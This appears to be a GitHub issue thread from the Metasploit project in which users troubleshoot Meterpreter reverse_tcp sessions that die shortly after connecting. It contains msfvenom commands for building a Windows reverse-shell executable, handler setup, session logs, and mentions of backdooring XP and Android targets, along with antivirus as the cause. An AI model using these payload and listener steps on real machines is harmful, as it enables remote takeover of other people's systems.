Metasploit-framework: Meterpreter session 1 closed. Reason: Died

more details would be necessary to reproduce this

OS - Kali
MSF Ver - new

payload --> msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.100.14 LPORT=4444 >R payload.exe

use multi/handler
set PAYLOAD windows/meterpreter/reverse_tcp
set LHOST 192.168.100.14
set LPORT 4444
exploit

After that sessions has connected however 3 or 4 minutes later it's disconnected with this msg

meterpreter > sysinfo
[-] Error running command sysinfo: Rex::TimeoutError Operation timed out.
meterpreter > shell

[*] 192.168.100.14 - Meterpreter session 1 closed. Reason: Died
[-] Error running command shell: Rex::TimeoutError Operation timed out.
msf exploit(multi/handler)

So I'm clueless now, why its disconnecting each time after connecting with pc ?

ITS on my LAN

Appreciate you'r input.

Use (Venom.TheFatRat etc) to create payload however same error on each payload.

Host - VirtualBox
Network - Bridge
Port Forward - Yes

Invalid:

msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.100.14 LPORT=4444 >R payload.exe

Try something like this:

msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.100.14 LPORT=4444 --format exe > payload.exe 

Better still, use -o to specify the target file instead of > to redirect
output.

Appreciate you'r Input guys however problem is not a payload cuz I have created payload with venom, Fatrat etc and its connected with my other PC which is in same LAN but after 2 or 3 minutes later its disconnect Automatically......with this msg

**meterpreter > sysinfo
[-] Error running command sysinfo: Rex::TimeoutError Operation timed out.
meterpreter > shell

[] 192.168.100.14 - Meterpreter session 1 closed. Reason: Died
[-] Error running command shell: Rex::TimeoutError Operation timed out.
msf exploit(multi/handler)*

Why......................???

The problem is the payload. You're doing it wrong.

payload ? seriously??????

I told you payload was created with venom n TheFatRat and its work fine ...... connect however after 3 min later its disconnect automatically

[*] 192.168.100.14 - Meterpreter session 1 closed. Reason: Died

[*] 192.168.100.14 - Meterpreter session 1 >>-----------> See payload worked !!

But its disconnect after 2 or 3 min with msg Meterpreter session 1 closed. Reason: Died.

if payload has problem then how came I have got meterpreter session??? and I can run few commands like sysinfo with results however again its disconnect with MSF.

Appreciate your insight.

Can you get valid output from commands such as sysinfo ?

It looks like a socket connection is successful, but Meterpreter has not loaded correctly. Perhaps it's being killed by AV.

Note that even though a Meterpreter session was established, this indicates only that a successful socket connection was established. For example:

msf5 > use exploit/multi/handler 
msf5 exploit(multi/handler) > set payload windows/meterpreter/reverse_tcp
payload => windows/meterpreter/reverse_tcp
msf5 exploit(multi/handler) > set lport 1337
lport => 1337
semsf5 exploit(multi/handler) > set lhost 127.0.0.1
lhost => 127.0.0.1
msf5 exploit(multi/handler) > run  # now, in another window `nc 127.0.0.1 1337`

[!] You are binding to a loopback address by setting LHOST to 127.0.0.1. Did you want ReverseListenerBindAddress?
[*] Started reverse TCP handler on 127.0.0.1:1337 
[*] Sending stage (179779 bytes) to 127.0.0.1

^C[-] Exploit failed: Interrupt 
[*] Exploit completed, but no session was created.
msf5 exploit(multi/handler) > sessions

Active sessions
===============

  Id  Name  Type                     Information  Connection
  --  ----  ----                     -----------  ----------
  1         meterpreter x86/windows               127.0.0.1:1337 -> 127.0.0.1:56907 (127.0.0.1)

msf5 exploit(multi/handler) > sessions -i 1
[*] Starting interaction with 1...

meterpreter > sysinfo
[-] Unknown command: sysinfo.
meterpreter > 

Just to back this issue, i am having the same problem too, everytime i spawn a reverse_tcp the end client connects i get a successful connection and then it dies straight away. ive seen a lot of this happening across googling so i think this is an issue with metasploit itself>?

^^ Agree with Rzqu ''I get a successful connection and then it dies straight away'' Same Issue I don't know why??? Is it AV or anything else? Not sure, but I'm defiantly sure about payload and port these both things were absolutely fine.

So I'm clueless ................................

Any Insight appreciate.

@kali64amd Can you get valid output from any commands such as sysinfo ?

It's possible that it's AV. You could also try using a non-staged payload.

@Rzqu it's possible that that's a different issue. Did any sessions survive? There's an issue where several sessions are opened, but only one is valid. The invalid sessions die, but a remaining valid session is viewable with sessions.

then try it on a vm without AV and see, payload is definitely working fine on my end

@bcoles Yes I did get valid output of sysinfo .... however as I said earlier connection was disconnected after 2 or 3 minutes

Don't know why??? AV or something???

Appreciate your input.

I think you can answer if you have AV better than any of us can. :-)

What's your valid sysinfo output?

hello Everyone !!

I have figure out what was wrong on this issue,

1) Network issue
2) AV

What I find is these 2 issue disconcerting Meterpreter session.

So if Anyone getting these type of Error msg I would advise first check the Network availability of target machine and second thing is AV.

Hope this will help others.....

Appreciate you'r help guys!!!

I'm glad you figured it out. It's usually those two culprits. :)

can anyone tell me what does AV mean?

@dmcgrat4 Antivirus

@jrobles-r7 oh of course how silly of me, so even if i am running kali linux and my target os on vmware in a nat network i still need to turn off my host AV?

just to be be clear
Host: Windows 10 running
Kali linux and ubuntu (the target os)

What do you think? NAT only means computer isn't visible to your home network but it stil can access the internet as your home network can which means AV can get the latest malware definitions. AV's aren't generally affected by network config at all unless they don't have access to the Internet.

Also Windows Defender is also an IDS, and is also machine-learning. There's a big chance that if it catches your shell on the first try, you can't do it again.

Started reverse TCP double handler on 192.168.13.149:4444
[] 108.179.242.41:21 - Sending Backdoor Command
[] Exploit completed, but no session was created

I have this problem : if can solve please tell me what to do next

The target is not vulnerable, or you are using the exploit incorrectly.

meterpreter > sysinfo
Computer : localhost
OS : Android 6.0.1 - Linux 3.10.49-8935060 (armv7l)
Meterpreter : dalvik/android
meterpreter > shell
[-] stdapi_sys_config_getenv: Operation failed: 1
meterpreter >

Help shell command doesn't work

meterpreter > sysinfo
Computer : localhost
OS : Android 6.0.1 - Linux 3.10.49-8935060 (armv7l)
Meterpreter : dalvik/android
meterpreter > shell
[-] stdapi_sys_config_getenv: Operation failed: 1
meterpreter >

Help shell command doesn't work

unfortunately my shell command is also not working... have you found the solution?

@agglaake99 the fix for that issue was already merged here: https://github.com/rapid7/metasploit-framework/pull/11976
Please update metasploit to grab the fix.

I try to use kali exploit win xp sp2, every time I try to use backdoors installed on the xp machine, and when I reboot the xp machine, when it started, the backdoor sessions just died, maybe AV? but I already closed all the firewall and the stuff, ping is ok between the two machines. Spruik!!

Please do not comment on a closed ticket. This issue was resolved. If you have the same issue, update your copy of metasploit to receive the fix.
Also when submitting issues give more details (and don't just reply here as previously noted). How was the backdoor created, are you using a persistence method, what version of metasploit etc

1. I Don't Know why for at least 2-3 minutes i get a successful connection and then it says :
   "-Meterpreter session 1 closed. Reason: Died

2. And also when i give some commands like app_list etc it says : "Error running command app_list:
   Rex::TimeoutError Operation timed out"

   Can you help me !!!

i also get the same problem...wht should i do.i dont understand....pls.....

I think if you find version of metasploit problem.

hissh05 notifications@github.com 于2020年5月28日周四 上午3:24写道：

i also get the same problem...wht should i do.i dont understand....pls.....

—
You are receiving this because you commented.
Reply to this email directly, view it on GitHub
https://github.com/rapid7/metasploit-framework/issues/10416#issuecomment-634817605,
or unsubscribe
https://github.com/notifications/unsubscribe-auth/ADKGA7CBDRNXURSZDRNBUOLRTVEEVANCNFSM4FNPM4TA
.

--
Regards,
Dongsheng(Thomas) Wang
IT professional
M +61478590767
Linkedin: https://www.linkedin.com/in/wds3817/

Thanks for your email!

hello Everyone !!

I have figure out what was wrong on this issue,

1. Network issue
2. AV

What I find is these 2 issue disconcerting Meterpreter session.

So if Anyone getting these type of Error msg I would advise first check the Network availability of target machine and second thing is AV.

Hope this will help others.....

Appreciate you'r help guys!!!

sorry, what is AV??

sorry, what is AV??

AV = anti-virus software

Has anyone found any solution to this?

Yes; this issue is closed because the author determined that the solution was that there was a problem with their networking and AV.